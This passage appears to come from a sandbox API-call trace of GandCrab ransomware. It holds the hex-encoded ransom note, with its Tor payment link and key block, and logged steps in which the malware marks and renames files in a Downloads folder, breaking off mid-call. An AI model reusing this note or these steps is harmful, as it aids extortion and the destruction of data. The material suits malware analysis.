x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0096.371] WriteFile (in: hFile=0x230, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259f508, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259f508*=0x2162, lpOverlapped=0x0) returned 1 [0096.378] CloseHandle (hObject=0x230) returned 1 [0096.378] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.378] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0096.379] GetSystemTime (in: lpSystemTime=0x1e70400 | out: lpSystemTime=0x1e70400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x29, wMilliseconds=0x2b4)) [0096.379] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0096.379] GetWindowsDirectoryW (in: lpBuffer=0x2410000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0096.379] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2410200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2410600, lpMaximumComponentLength=0x2410608, lpFileSystemFlags=0x2410604, lpFileSystemNameBuffer=0x2410400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2410600*=0xd2ca4def, lpMaximumComponentLength=0x2410608*=0xff, lpFileSystemFlags=0x2410604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0096.379] wsprintfW (in: param_1=0x1e70000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\Default\\Downloads\\d2ca4a09d2ca4deb61a.lock") returned 51 [0096.379] CreateFileW (lpFileName="C:\\Users\\Default\\Downloads\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\default\\downloads\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x230 [0096.380] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.380] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.380] lstrlenW (lpString="C:\\Users\\Default\\Downloads\\") returned 27 [0096.380] lstrcatW (in: lpString1="C:\\Users\\Default\\Downloads\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\Downloads\\*") returned="C:\\Users\\Default\\Downloads\\*" [0096.380] FindFirstFileExW (in: lpFileName="C:\\Users\\Default\\Downloads\\*", fInfoLevelId=0x1, lpFindFileData=0x259f524, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259f524) returned 0x5038f8 [0096.380] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0096.380] FindNextFileW (in: hFindFile=0x5038f8, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0096.381] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0096.381] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0096.381] FindNextFileW (in: hFindFile=0x5038f8, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0096.381] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0096.381] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0096.381] lstrcatW (in: lpString1="C:\\Users\\Default\\Downloads\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\Default\\Downloads\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\Default\\Downloads\\d2ca4a09d2ca4deb61a.lock" [0096.381] lstrlenW (lpString=".titwmvjl") returned 9 [0096.382] lstrlenW (lpString="C:\\Users\\Default\\Downloads\\d2ca4a09d2ca4deb61a.lock") returned 51 [0096.382] VirtualAlloc (lpAddress=0x0, dwSize=0xa6, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0096.382] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\Default\\Downloads\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 60 [0096.382] lstrlenW (lpString="C:\\Users\\Default\\Downloads\\d2ca4a09d2ca4deb61a.lock") returned 51 [0096.382] lstrlenW (lpString=".lock") returned 5 [0096.382] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, 